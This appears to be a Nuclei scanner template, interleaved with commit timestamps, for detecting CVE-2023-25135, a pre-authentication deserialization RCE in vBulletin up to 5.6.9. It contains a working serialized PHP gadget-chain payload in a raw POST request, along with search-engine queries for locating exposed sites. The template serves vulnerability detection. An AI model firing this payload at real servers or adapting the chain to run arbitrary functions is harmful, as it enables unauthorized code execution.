2023-05-10 15:15:19 +00:00
id : CVE-2023-25135
2023-05-09 16:40:11 +00:00
info :
2023-05-10 15:15:19 +00:00
name : vBulletin <= 5.6.9 - Pre-authentication Remote Code Execution
author : iamnoooob,rootxharsh,pdresearch
severity : critical
2023-05-09 16:40:11 +00:00
description : |
2023-05-10 15:15:19 +00:00
vBulletin before 5.6.9 PL1 allows an unauthenticated remote attacker to execute arbitrary code via a crafted HTTP request that triggers deserialization. This occurs because verify_serialized checks that a value is serialized by calling unserialize and then checking for errors.
2023-05-09 16:40:11 +00:00
reference :
2023-05-10 15:15:19 +00:00
- https://www.ambionics.io/blog/vbulletin-unserializable-but-unreachable
- https://github.com/ambionics/vbulletin-exploits/blob/main/vbulletin-rce-cve-2023-25135.py
- https://nvd.nist.gov/vuln/detail/CVE-2023-25135
- https://forum.vbulletin.com/forum/vbulletin-announcements/vbulletin-announcements_aa/4473890-vbulletin-5-6-9-security-patch
remediation : The fixed versions are 5.6.7 PL1, 5.6.8 PL1, and 5.6.9 PL1.
2023-05-09 16:40:11 +00:00
classification :
2023-05-10 15:15:19 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
2023-07-11 19:49:27 +00:00
cve-id : CVE-2023-25135
2023-05-10 15:15:19 +00:00
cwe-id : CWE-502
2023-07-11 19:49:27 +00:00
epss-score : 0.65662
cpe : cpe:2.3:a:vbulletin:vbulletin:5.6.7:-:*:*:*:*:*:*
2023-05-09 16:40:11 +00:00
metadata :
2023-05-10 15:15:19 +00:00
max-request : 1
2023-06-04 08:13:42 +00:00
verified : true
2023-05-10 15:15:19 +00:00
google-query : intext:"Powered By vBulletin"
shodan-query : http.component:"vBulletin"
2023-07-11 19:49:27 +00:00
vendor : vbulletin
product : vbulletin
2023-05-10 15:15:19 +00:00
tags : cve,cve2023,vbulletin,rce,kev
2023-05-09 16:40:11 +00:00
2023-05-10 13:44:55 +00:00
http :
2023-05-09 16:40:11 +00:00
- raw :
- |
2023-05-10 15:15:19 +00:00
POST /ajax/api/user/save HTTP/1.1
2023-05-10 15:16:40 +00:00
Host : {{Hostname}}
2023-05-09 16:40:11 +00:00
Content-Type : application/x-www-form-urlencoded
2023-05-10 15:15:19 +00:00
adminoptions=&options=&password={{randstr}}&securitytoken={{randstr}}&user%5Bemail%5D=pown%40pown.net&user%5Bpassword%5D=password&user%5Bsearchprefs%5D=a%3a2%3a{i%3a0%3bO%3a27%3a"googlelogin_vendor_autoload"%3a0%3a{}i%3a1%3bO%3a32%3a"Monolog\Handler\SyslogUdpHandler"%3a1%3a{s%3a9%3a"%00*%00socket"%3bO%3a29%3a"Monolog\Handler\BufferHandler"%3a7%3a{s%3a10%3a"%00*%00handler"%3br%3a4%3bs%3a13%3a"%00*%00bufferSize"%3bi%3a-1%3bs%3a9%3a"%00*%00buffer"%3ba%3a1%3a{i%3a0%3ba%3a2%3a{i%3a0%3bs%3a14%3a"CVE-2023-25135"%3bs%3a5%3a"level"%3bN%3b}}s%3a8%3a"%00*%00level"%3bN%3bs%3a14%3a"%00*%00initialized"%3bb%3a1%3bs%3a14%3a"%00*%00bufferLimit"%3bi%3a-1%3bs%3a13%3a"%00*%00processors"%3ba%3a2%3a{i%3a0%3bs%3a7%3a"current"%3bi%3a1%3bs%3a8%3a"var_dump"%3b}}}}&user%5Busername%5D={{randstr}}&userfield=&userid=0
2023-07-11 19:49:27 +00:00
2023-05-09 16:40:11 +00:00
matchers-condition : and
matchers :
- type : word
part : body
words :
2023-05-10 15:15:19 +00:00
- 'string(14)'
- '"CVE-2023-25135"'
condition : and
2023-07-11 19:49:27 +00:00
2023-05-09 16:40:11 +00:00
- type : word
part : header
words :
2023-05-10 15:15:19 +00:00
- "application/json"
2023-05-09 16:40:11 +00:00
- type : status
status :
- 200